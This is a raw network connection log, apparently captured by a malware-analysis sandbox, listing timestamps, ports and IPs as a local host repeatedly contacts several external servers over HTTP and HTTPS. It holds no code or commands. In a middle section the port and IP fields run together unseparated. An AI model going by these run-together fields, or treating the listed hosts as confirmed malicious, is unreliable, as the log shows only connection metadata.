Jan 15, 2025 12:57:07.616029978 CET  49163        80         192.168.2.22    54.244.188.177
Jan 15, 2025 12:57:07.623370886 CET  80           49163      54.244.188.177  192.168.2.22
Jan 15, 2025 12:57:07.623445034 CET  49163        80         192.168.2.22    54.244.188.177
Jan 15, 2025 12:57:07.669348955 CET  49163        80         192.168.2.22    54.244.188.177
Jan 15, 2025 12:57:07.669388056 CET  49163        80         192.168.2.22    54.244.188.177
Jan 15, 2025 12:57:07.675308943 CET  80           49163      54.244.188.177  192.168.2.22
Jan 15, 2025 12:57:07.675368071 CET  80           49163      54.244.188.177  192.168.2.22
Jan 15, 2025 12:57:07.680469036 CET  49164        80         192.168.2.22    54.244.188.177
Jan 15, 2025 12:57:07.685497046 CET  80           49164      54.244.188.177  192.168.2.22
Jan 15, 2025 12:57:07.685564041 CET  49164        80         192.168.2.22    54.244.188.177
Jan 15, 2025 12:57:07.710762978 CET  49164        80         192.168.2.22    54.244.188.177
Jan 15, 2025 12:57:07.710783958 CET  49164        80         192.168.2.22    54.244.188.177
Jan 15, 2025 12:57:07.715658903 CET  80           49164      54.244.188.177  192.168.2.22
Jan 15, 2025 12:57:07.715771914 CET  80           49164      54.244.188.177  192.168.2.22
Jan 15, 2025 12:57:08.335462093 CET  80           49163      54.244.188.177  192.168.2.22
Jan 15, 2025 12:57:08.335485935 CET  80           49163      54.244.188.177  192.168.2.22
Jan 15, 2025 12:57:08.335542917 CET  49163        80         192.168.2.22    54.244.188.177
Jan 15, 2025 12:57:08.390084028 CET  80           49164      54.244.188.177  192.168.2.22
Jan 15, 2025 12:57:08.391391993 CET  80           49164      54.244.188.177  192.168.2.22
Jan 15, 2025 12:57:08.391444921 CET  49164        80         192.168.2.22    54.244.188.177
Jan 15, 2025 12:57:08.780658007 CET  49164        80         192.168.2.22    54.244.188.177
Jan 15, 2025 12:57:08.785645962 CET  80           49164      54.244.188.177  192.168.2.22
Jan 15, 2025 12:57:08.817503929 CET  49165        80         192.168.2.22    18.141.10.107
Jan 15, 2025 12:57:08.822962999 CET  80           49165      18.141.10.107   192.168.2.22
Jan 15, 2025 12:57:08.823029041 CET  49165        80         192.168.2.22    18.141.10.107
Jan 15, 2025 12:57:08.827080965 CET  49165        80         192.168.2.22    18.141.10.107
Jan 15, 2025 12:57:08.827114105 CET  49165        80         192.168.2.22    18.141.10.107
Jan 15, 2025 12:57:08.832020044 CET  80           49165      18.141.10.107   192.168.2.22
Jan 15, 2025 12:57:08.832048893 CET  80           49165      18.141.10.107   192.168.2.22
Jan 15, 2025 12:57:09.314410925 CET  49166        80         192.168.2.22    193.122.130.0
Jan 15, 2025 12:57:09.320086956 CET  80           49166      193.122.130.0   192.168.2.22
Jan 15, 2025 12:57:09.320152998 CET  49166        80         192.168.2.22    193.122.130.0
Jan 15, 2025 12:57:09.321055889 CET  49166        80         192.168.2.22    193.122.130.0
Jan 15, 2025 12:57:09.326812029 CET  80           49166      193.122.130.0   192.168.2.22
Jan 15, 2025 12:57:09.794862986 CET  80           49166      193.122.130.0   192.168.2.22
Jan 15, 2025 12:57:10.003750086 CET  80           49166      193.122.130.0   192.168.2.22
Jan 15, 2025 12:57:10.007431984 CET  49166        80         192.168.2.22    193.122.130.0
Jan 15, 2025 12:57:10.202420950 CET  80           49165      18.141.10.107   192.168.2.22
Jan 15, 2025 12:57:10.202498913 CET  80           49165      18.141.10.107   192.168.2.22
Jan 15, 2025 12:57:10.202721119 CET  49165        80         192.168.2.22    18.141.10.107
Jan 15, 2025 12:57:10.213413954 CET  49165        80         192.168.2.22    18.141.10.107
Jan 15, 2025 12:57:10.218501091 CET  80           49165      18.141.10.107   192.168.2.22
Jan 15, 2025 12:57:10.707747936 CET  49167        80         192.168.2.22    54.244.188.177
Jan 15, 2025 12:57:10.712722063 CET  80           49167      54.244.188.177  192.168.2.22
Jan 15, 2025 12:57:10.712783098 CET  49167        80         192.168.2.22    54.244.188.177
Jan 15, 2025 12:57:10.714670897 CET  49167        80         192.168.2.22    54.244.188.177
Jan 15, 2025 12:57:10.714715004 CET  49167        80         192.168.2.22    54.244.188.177
Jan 15, 2025 12:57:10.719578028 CET  80           49167      54.244.188.177  192.168.2.22
Jan 15, 2025 12:57:10.719608068 CET  80           49167      54.244.188.177  192.168.2.22
Jan 15, 2025 12:57:10.838721037 CET  49166        80         192.168.2.22    193.122.130.0
Jan 15, 2025 12:57:10.843888998 CET  80           49166      193.122.130.0   192.168.2.22
Jan 15, 2025 12:57:10.938925028 CET  80           49166      193.122.130.0   192.168.2.22
Jan 15, 2025 12:57:11.062041044 CET  49168        443        192.168.2.22    104.21.80.1
Jan 15, 2025 12:57:11.062077045 CET  443          49168      104.21.80.1     192.168.2.22
Jan 15, 2025 12:57:11.062118053 CET  49168        443        192.168.2.22    104.21.80.1
Jan 15, 2025 12:57:11.091633081 CET  49168        443        192.168.2.22    104.21.80.1
Jan 15, 2025 12:57:11.091648102 CET  443          49168      104.21.80.1     192.168.2.22
Jan 15, 2025 12:57:11.148611069 CET  80           49166      193.122.130.0   192.168.2.22
Jan 15, 2025 12:57:11.148649931 CET  49166        80         192.168.2.22    193.122.130.0
Jan 15, 2025 12:57:11.427480936 CET  80           49167      54.244.188.177  192.168.2.22
Jan 15, 2025 12:57:11.427565098 CET  80           49167      54.244.188.177  192.168.2.22
Jan 15, 2025 12:57:11.427664995 CET  49167        80         192.168.2.22    54.244.188.177
Jan 15, 2025 12:57:11.439404011 CET  49167        80         192.168.2.22    54.244.188.177
Jan 15, 2025 12:57:11.444694042 CET  80           49167      54.244.188.177  192.168.2.22
Jan 15, 2025 12:57:11.580003977 CET  443          49168      104.21.80.1     192.168.2.22
Jan 15, 2025 12:57:11.580085039 CET  49168        443        192.168.2.22    104.21.80.1
Jan 15, 2025 12:57:11.628669977 CET  49168        443        192.168.2.22    104.21.80.1
Jan 15, 2025 12:57:11.628699064 CET  443          49168      104.21.80.1     192.168.2.22
Jan 15, 2025 12:57:11.629822016 CET  443          49168      104.21.80.1     192.168.2.22
Jan 15, 2025 12:57:11.839333057 CET  443          49168      104.21.80.1     192.168.2.22
Jan 15, 2025 12:57:11.843379021 CET  49168        443        192.168.2.22    104.21.80.1
Jan 15, 2025 12:57:11.908478022 CET  49169        80         192.168.2.22    44.221.84.105
Jan 15, 2025 12:57:11.913438082 CET  80           49169      44.221.84.105   192.168.2.22
Jan 15, 2025 12:57:11.915673971 CET  49169        80         192.168.2.22    44.221.84.105
Jan 15, 2025 12:57:11.915673971 CET  49169        80         192.168.2.22    44.221.84.105
Jan 15, 2025 12:57:11.915673971 CET  49169        80         192.168.2.22    44.221.84.105
Jan 15, 2025 12:57:11.921220064 CET  80           49169      44.221.84.105   192.168.2.22
Jan 15, 2025 12:57:11.921260118 CET  80           49169      44.221.84.105   192.168.2.22
Jan 15, 2025 12:57:11.976378918 CET  49168        443        192.168.2.22    104.21.80.1
Jan 15, 2025 12:57:12.019352913 CET  443          49168      104.21.80.1     192.168.2.22
Jan 15, 2025 12:57:12.095705986 CET  443          49168      104.21.80.1     192.168.2.22
Jan 15, 2025 12:57:12.095873117 CET  443          49168      104.21.80.1     192.168.2.22
Jan 15, 2025 12:57:12.095963955 CET  49168        443        192.168.2.22    104.21.80.1
Jan 15, 2025 12:57:12.225914955 CET  49168        443        192.168.2.22    104.21.80.1
Jan 15, 2025 12:57:12.382141113 CET  80           49169      44.221.84.105   192.168.2.22
Jan 15, 2025 12:57:12.382229090 CET  80           49169      44.221.84.105   192.168.2.22
Jan 15, 2025 12:57:12.382294893 CET  49169        80         192.168.2.22    44.221.84.105
Jan 15, 2025 12:57:12.416435003 CET  49169        80         192.168.2.22    44.221.84.105
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:12.421719074 CET804916944.221.84.105192.168.2.22
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:12.924144983 CET4917080192.168.2.2272.52.178.23
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:12.929368019 CET804917072.52.178.23192.168.2.22
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:12.929447889 CET4917080192.168.2.2272.52.178.23
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:12.929582119 CET4917080192.168.2.2272.52.178.23
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:12.929615021 CET4917080192.168.2.2272.52.178.23
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:12.934573889 CET804917072.52.178.23192.168.2.22
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:12.934608936 CET804917072.52.178.23192.168.2.22
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:13.485886097 CET804917072.52.178.23192.168.2.22
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:13.686531067 CET4917080192.168.2.2272.52.178.23
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:14.155699015 CET4917180192.168.2.22199.59.243.228
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:14.160586119 CET8049171199.59.243.228192.168.2.22
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:14.160648108 CET4917180192.168.2.22199.59.243.228
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:14.160757065 CET4917180192.168.2.22199.59.243.228
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:14.165539980 CET8049171199.59.243.228192.168.2.22
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:14.636079073 CET8049171199.59.243.228192.168.2.22
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:14.636101007 CET8049171199.59.243.228192.168.2.22
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:14.636142015 CET4917180192.168.2.22199.59.243.228
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:15.590998888 CET4917080192.168.2.2272.52.178.23
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:15.591046095 CET4917080192.168.2.2272.52.178.23
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:15.595895052 CET804917072.52.178.23192.168.2.22
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:15.596276045 CET804917072.52.178.23192.168.2.22
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:15.747982025 CET804917072.52.178.23192.168.2.22
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:15.774323940 CET4917180192.168.2.22199.59.243.228
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:15.779257059 CET8049171199.59.243.228192.168.2.22
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:15.878885031 CET8049171199.59.243.228192.168.2.22
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:15.879007101 CET8049171199.59.243.228192.168.2.22
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:15.879069090 CET4917180192.168.2.22199.59.243.228
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:15.992872000 CET804917072.52.178.23192.168.2.22
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:15.992933035 CET4917080192.168.2.2272.52.178.23
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:15.996840954 CET4917280192.168.2.2218.141.10.107
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:16.003274918 CET804917218.141.10.107192.168.2.22
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:16.003376007 CET4917280192.168.2.2218.141.10.107
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:16.003444910 CET4917280192.168.2.2218.141.10.107
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:16.003459930 CET4917280192.168.2.2218.141.10.107
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:16.009668112 CET804917218.141.10.107192.168.2.22
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:16.009701967 CET804917218.141.10.107192.168.2.22
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:17.374181032 CET804917218.141.10.107192.168.2.22
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:17.374277115 CET804917218.141.10.107192.168.2.22
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:17.374464035 CET4917280192.168.2.2218.141.10.107
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:18.201487064 CET4917280192.168.2.2218.141.10.107
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:18.206804037 CET804917218.141.10.107192.168.2.22
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:18.895920992 CET4917380192.168.2.2282.112.184.197
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:18.900762081 CET804917382.112.184.197192.168.2.22
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:18.900810003 CET4917380192.168.2.2282.112.184.197
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:18.900938034 CET4917380192.168.2.2282.112.184.197
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:18.900959969 CET4917380192.168.2.2282.112.184.197
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:18.905677080 CET804917382.112.184.197192.168.2.22
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:18.905689955 CET804917382.112.184.197192.168.2.22
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:19.610032082 CET4916380192.168.2.2254.244.188.177
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:25.879328966 CET8049171199.59.243.228192.168.2.22
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:25.879473925 CET4917180192.168.2.22199.59.243.228
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:25.883193970 CET4917180192.168.2.22199.59.243.228
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:25.888808012 CET8049171199.59.243.228192.168.2.22
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:40.297342062 CET804917382.112.184.197192.168.2.22
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:40.297422886 CET4917380192.168.2.2282.112.184.197
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:40.297463894 CET4917380192.168.2.2282.112.184.197
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:40.303162098 CET804917382.112.184.197192.168.2.22
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:40.310295105 CET4917480192.168.2.2282.112.184.197
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:40.316194057 CET804917482.112.184.197192.168.2.22
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:40.316270113 CET4917480192.168.2.2282.112.184.197
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:40.316378117 CET4917480192.168.2.2282.112.184.197
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:40.316396952 CET4917480192.168.2.2282.112.184.197
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:40.321971893 CET804917482.112.184.197192.168.2.22
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:40.321985960 CET804917482.112.184.197192.168.2.22
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:43.648257017 CET4917580192.168.2.2254.244.188.177
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:43.653229952 CET804917554.244.188.177192.168.2.22
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:43.653290987 CET4917580192.168.2.2254.244.188.177
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:43.655831099 CET4917580192.168.2.2254.244.188.177
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:43.655858994 CET4917580192.168.2.2254.244.188.177
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:43.662039042 CET804917554.244.188.177192.168.2.22
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:43.662055969 CET804917554.244.188.177192.168.2.22
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:44.372157097 CET804917554.244.188.177192.168.2.22
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:44.372246981 CET804917554.244.188.177192.168.2.22
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:44.372539997 CET4917580192.168.2.2254.244.188.177
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:44.410403013 CET4917580192.168.2.2254.244.188.177
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:44.415286064 CET804917554.244.188.177192.168.2.22
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:44.419655085 CET4917680192.168.2.2218.141.10.107
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:44.424544096 CET804917618.141.10.107192.168.2.22
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:44.424603939 CET4917680192.168.2.2218.141.10.107
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:44.424696922 CET4917680192.168.2.2218.141.10.107
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:44.424719095 CET4917680192.168.2.2218.141.10.107
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:44.430304050 CET804917618.141.10.107192.168.2.22
Jan 15, 2025 12:57:44.430351019 CET | 80 | 49176 | 18.141.10.107 | 192.168.2.22
Jan 15, 2025 12:57:45.800672054 CET | 80 | 49176 | 18.141.10.107 | 192.168.2.22
Jan 15, 2025 12:57:45.800838947 CET | 80 | 49176 | 18.141.10.107 | 192.168.2.22
Jan 15, 2025 12:57:45.800892115 CET | 49176 | 80 | 192.168.2.22 | 18.141.10.107
Jan 15, 2025 12:57:45.801518917 CET | 49176 | 80 | 192.168.2.22 | 18.141.10.107
Jan 15, 2025 12:57:45.806353092 CET | 80 | 49176 | 18.141.10.107 | 192.168.2.22
Jan 15, 2025 12:57:45.951962948 CET | 49177 | 80 | 192.168.2.22 | 54.244.188.177
Jan 15, 2025 12:57:45.957401037 CET | 80 | 49177 | 54.244.188.177 | 192.168.2.22
Jan 15, 2025 12:57:45.957467079 CET | 49177 | 80 | 192.168.2.22 | 54.244.188.177
Jan 15, 2025 12:57:45.959305048 CET | 49177 | 80 | 192.168.2.22 | 54.244.188.177
Jan 15, 2025 12:57:45.959330082 CET | 49177 | 80 | 192.168.2.22 | 54.244.188.177
Jan 15, 2025 12:57:45.964133978 CET | 80 | 49177 | 54.244.188.177 | 192.168.2.22
Jan 15, 2025 12:57:45.964165926 CET | 80 | 49177 | 54.244.188.177 | 192.168.2.22
Jan 15, 2025 12:57:46.694590092 CET | 80 | 49177 | 54.244.188.177 | 192.168.2.22
Jan 15, 2025 12:57:46.694674969 CET | 80 | 49177 | 54.244.188.177 | 192.168.2.22
Jan 15, 2025 12:57:46.694760084 CET | 49177 | 80 | 192.168.2.22 | 54.244.188.177
Jan 15, 2025 12:57:46.718522072 CET | 49177 | 80 | 192.168.2.22 | 54.244.188.177
Jan 15, 2025 12:57:46.724488020 CET | 80 | 49177 | 54.244.188.177 | 192.168.2.22
Jan 15, 2025 12:57:46.744435072 CET | 49178 | 80 | 192.168.2.22 | 44.221.84.105
Jan 15, 2025 12:57:46.749299049 CET | 80 | 49178 | 44.221.84.105 | 192.168.2.22
Jan 15, 2025 12:57:46.749381065 CET | 49178 | 80 | 192.168.2.22 | 44.221.84.105
Jan 15, 2025 12:57:46.851247072 CET | 49178 | 80 | 192.168.2.22 | 44.221.84.105
Jan 15, 2025 12:57:46.851248026 CET | 49178 | 80 | 192.168.2.22 | 44.221.84.105
Jan 15, 2025 12:57:46.856422901 CET | 80 | 49178 | 44.221.84.105 | 192.168.2.22
Jan 15, 2025 12:57:46.856462002 CET | 80 | 49178 | 44.221.84.105 | 192.168.2.22
Jan 15, 2025 12:57:47.233333111 CET | 80 | 49178 | 44.221.84.105 | 192.168.2.22
Jan 15, 2025 12:57:47.233674049 CET | 80 | 49178 | 44.221.84.105 | 192.168.2.22
Jan 15, 2025 12:57:47.233752012 CET | 49178 | 80 | 192.168.2.22 | 44.221.84.105
Jan 15, 2025 12:57:47.234425068 CET | 49178 | 80 | 192.168.2.22 | 44.221.84.105
Jan 15, 2025 12:57:47.239221096 CET | 80 | 49178 | 44.221.84.105 | 192.168.2.22
Jan 15, 2025 12:57:47.261730909 CET | 49179 | 80 | 192.168.2.22 | 72.52.178.23
Jan 15, 2025 12:57:47.266546011 CET | 80 | 49179 | 72.52.178.23 | 192.168.2.22
Jan 15, 2025 12:57:47.266621113 CET | 49179 | 80 | 192.168.2.22 | 72.52.178.23
Jan 15, 2025 12:57:47.266736031 CET | 49179 | 80 | 192.168.2.22 | 72.52.178.23
Jan 15, 2025 12:57:47.266763926 CET | 49179 | 80 | 192.168.2.22 | 72.52.178.23
Jan 15, 2025 12:57:47.271748066 CET | 80 | 49179 | 72.52.178.23 | 192.168.2.22
Jan 15, 2025 12:57:47.271787882 CET | 80 | 49179 | 72.52.178.23 | 192.168.2.22
Jan 15, 2025 12:57:47.783277988 CET | 80 | 49179 | 72.52.178.23 | 192.168.2.22
Jan 15, 2025 12:57:47.995803118 CET | 80 | 49179 | 72.52.178.23 | 192.168.2.22
Jan 15, 2025 12:57:47.995884895 CET | 49179 | 80 | 192.168.2.22 | 72.52.178.23
Jan 15, 2025 12:57:48.253797054 CET | 49180 | 80 | 192.168.2.22 | 199.59.243.228
Jan 15, 2025 12:57:48.259182930 CET | 80 | 49180 | 199.59.243.228 | 192.168.2.22
Jan 15, 2025 12:57:48.259248018 CET | 49180 | 80 | 192.168.2.22 | 199.59.243.228
Jan 15, 2025 12:57:48.259345055 CET | 49180 | 80 | 192.168.2.22 | 199.59.243.228
Jan 15, 2025 12:57:48.264161110 CET | 80 | 49180 | 199.59.243.228 | 192.168.2.22
Jan 15, 2025 12:57:48.717209101 CET | 80 | 49180 | 199.59.243.228 | 192.168.2.22
Jan 15, 2025 12:57:48.717262983 CET | 80 | 49180 | 199.59.243.228 | 192.168.2.22
Jan 15, 2025 12:57:48.717437983 CET | 49180 | 80 | 192.168.2.22 | 199.59.243.228
Jan 15, 2025 12:57:48.903795004 CET | 49179 | 80 | 192.168.2.22 | 72.52.178.23
Jan 15, 2025 12:57:48.903795004 CET | 49179 | 80 | 192.168.2.22 | 72.52.178.23
Jan 15, 2025 12:57:48.908930063 CET | 80 | 49179 | 72.52.178.23 | 192.168.2.22
Jan 15, 2025 12:57:48.908966064 CET | 80 | 49179 | 72.52.178.23 | 192.168.2.22
Jan 15, 2025 12:57:49.046168089 CET | 80 | 49179 | 72.52.178.23 | 192.168.2.22
Jan 15, 2025 12:57:49.255733013 CET | 80 | 49179 | 72.52.178.23 | 192.168.2.22
Jan 15, 2025 12:57:49.255809069 CET | 49179 | 80 | 192.168.2.22 | 72.52.178.23
Jan 15, 2025 12:57:49.301747084 CET | 49181 | 80 | 192.168.2.22 | 76.223.26.96
Jan 15, 2025 12:57:49.306695938 CET | 80 | 49181 | 76.223.26.96 | 192.168.2.22
Jan 15, 2025 12:57:49.307461023 CET | 49181 | 80 | 192.168.2.22 | 76.223.26.96
Jan 15, 2025 12:57:49.307516098 CET | 49181 | 80 | 192.168.2.22 | 76.223.26.96
Jan 15, 2025 12:57:49.312354088 CET | 80 | 49181 | 76.223.26.96 | 192.168.2.22
Jan 15, 2025 12:57:49.946491957 CET | 80 | 49181 | 76.223.26.96 | 192.168.2.22
Jan 15, 2025 12:57:49.946557045 CET | 80 | 49181 | 76.223.26.96 | 192.168.2.22
Jan 15, 2025 12:57:49.946594000 CET | 80 | 49181 | 76.223.26.96 | 192.168.2.22
Jan 15, 2025 12:57:49.946624041 CET | 80 | 49181 | 76.223.26.96 | 192.168.2.22
Jan 15, 2025 12:57:49.946656942 CET | 80 | 49181 | 76.223.26.96 | 192.168.2.22
Jan 15, 2025 12:57:49.946691036 CET | 80 | 49181 | 76.223.26.96 | 192.168.2.22
Jan 15, 2025 12:57:49.946722984 CET | 80 | 49181 | 76.223.26.96 | 192.168.2.22
Jan 15, 2025 12:57:49.946747065 CET | 49181 | 80 | 192.168.2.22 | 76.223.26.96
Jan 15, 2025 12:57:49.946747065 CET | 49181 | 80 | 192.168.2.22 | 76.223.26.96
Jan 15, 2025 12:57:49.946747065 CET | 49181 | 80 | 192.168.2.22 | 76.223.26.96
Jan 15, 2025 12:57:49.946755886 CET | 80 | 49181 | 76.223.26.96 | 192.168.2.22
Jan 15, 2025 12:57:49.946789026 CET | 80 | 49181 | 76.223.26.96 | 192.168.2.22
Jan 15, 2025 12:57:49.946826935 CET | 80 | 49181 | 76.223.26.96 | 192.168.2.22
Jan 15, 2025 12:57:49.946830988 CET | 49181 | 80 | 192.168.2.22 | 76.223.26.96
Jan 15, 2025 12:57:49.946877956 CET | 49181 | 80 | 192.168.2.22 | 76.223.26.96
Jan 15, 2025 12:57:49.951761007 CET | 80 | 49181 | 76.223.26.96 | 192.168.2.22
Jan 15, 2025 12:57:49.951796055 CET | 80 | 49181 | 76.223.26.96 | 192.168.2.22
Jan 15, 2025 12:57:49.951828957 CET | 80 | 49181 | 76.223.26.96 | 192.168.2.22
Jan 15, 2025 12:57:49.951858997 CET | 49181 | 80 | 192.168.2.22 | 76.223.26.96
Jan 15, 2025 12:57:49.951862097 CET | 80 | 49181 | 76.223.26.96 | 192.168.2.22
Jan 15, 2025 12:57:49.951916933 CET | 49181 | 80 | 192.168.2.22 | 76.223.26.96
Jan 15, 2025 12:57:49.954952955 CET | 49181 | 80 | 192.168.2.22 | 76.223.26.96
Jan 15, 2025 12:57:50.033427954 CET | 80 | 49181 | 76.223.26.96 | 192.168.2.22
Jan 15, 2025 12:57:50.033473969 CET | 80 | 49181 | 76.223.26.96 | 192.168.2.22
Jan 15, 2025 12:57:50.033550978 CET | 80 | 49181 | 76.223.26.96 | 192.168.2.22
Jan 15, 2025 12:57:50.033560038 CET | 49181 | 80 | 192.168.2.22 | 76.223.26.96
Jan 15, 2025 12:57:50.152817965 CET | 49182 | 80 | 192.168.2.22 | 18.141.10.107
Jan 15, 2025 12:57:50.157707930 CET | 80 | 49182 | 18.141.10.107 | 192.168.2.22
Jan 15, 2025 12:57:50.157767057 CET | 49182 | 80 | 192.168.2.22 | 18.141.10.107
Jan 15, 2025 12:57:50.157849073 CET | 49182 | 80 | 192.168.2.22 | 18.141.10.107
Jan 15, 2025 12:57:50.157864094 CET | 49182 | 80 | 192.168.2.22 | 18.141.10.107
Jan 15, 2025 12:57:50.162647963 CET | 80 | 49182 | 18.141.10.107 | 192.168.2.22
Jan 15, 2025 12:57:50.162678003 CET | 80 | 49182 | 18.141.10.107 | 192.168.2.22
Jan 15, 2025 12:57:50.251743078 CET | 80 | 49181 | 76.223.26.96 | 192.168.2.22
Jan 15, 2025 12:57:50.251849890 CET | 49181 | 80 | 192.168.2.22 | 76.223.26.96
Jan 15, 2025 12:57:51.549118996 CET | 80 | 49182 | 18.141.10.107 | 192.168.2.22
Jan 15, 2025 12:57:51.549163103 CET | 80 | 49182 | 18.141.10.107 | 192.168.2.22
Jan 15, 2025 12:57:51.549669981 CET | 49182 | 80 | 192.168.2.22 | 18.141.10.107
Jan 15, 2025 12:57:51.623416901 CET | 49182 | 80 | 192.168.2.22 | 18.141.10.107
Jan 15, 2025 12:57:51.628338099 CET | 80 | 49182 | 18.141.10.107 | 192.168.2.22
Jan 15, 2025 12:57:51.655061960 CET | 49183 | 80 | 192.168.2.22 | 82.112.184.197
Jan 15, 2025 12:57:51.659912109 CET | 80 | 49183 | 82.112.184.197 | 192.168.2.22
Jan 15, 2025 12:57:51.659970999 CET | 49183 | 80 | 192.168.2.22 | 82.112.184.197
Jan 15, 2025 12:57:51.660360098 CET | 49183 | 80 | 192.168.2.22 | 82.112.184.197
Jan 15, 2025 12:57:51.660388947 CET | 49183 | 80 | 192.168.2.22 | 82.112.184.197
Jan 15, 2025 12:57:51.665225983 CET | 80 | 49183 | 82.112.184.197 | 192.168.2.22
Jan 15, 2025 12:57:51.665255070 CET | 80 | 49183 | 82.112.184.197 | 192.168.2.22
Jan 15, 2025 12:57:58.716315985 CET | 80 | 49180 | 199.59.243.228 | 192.168.2.22
Jan 15, 2025 12:57:58.716392040 CET | 49180 | 80 | 192.168.2.22 | 199.59.243.228
Jan 15, 2025 12:57:58.716434002 CET | 49180 | 80 | 192.168.2.22 | 199.59.243.228
Jan 15, 2025 12:57:58.721245050 CET | 80 | 49180 | 199.59.243.228 | 192.168.2.22
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:01.684170008 CET804917482.112.184.197192.168.2.22
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:01.684258938 CET4917480192.168.2.2282.112.184.197
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:01.684370041 CET4917480192.168.2.2282.112.184.197
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:01.689291954 CET804917482.112.184.197192.168.2.22
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:01.758831024 CET4918480192.168.2.2282.112.184.197
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:01.763865948 CET804918482.112.184.197192.168.2.22
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:01.763936996 CET4918480192.168.2.2282.112.184.197
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:01.764179945 CET4918480192.168.2.2282.112.184.197
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:01.764204979 CET4918480192.168.2.2282.112.184.197
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:01.769017935 CET804918482.112.184.197192.168.2.22
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:01.769268036 CET804918482.112.184.197192.168.2.22
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:13.044840097 CET804918382.112.184.197192.168.2.22
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:13.044910908 CET4918380192.168.2.2282.112.184.197
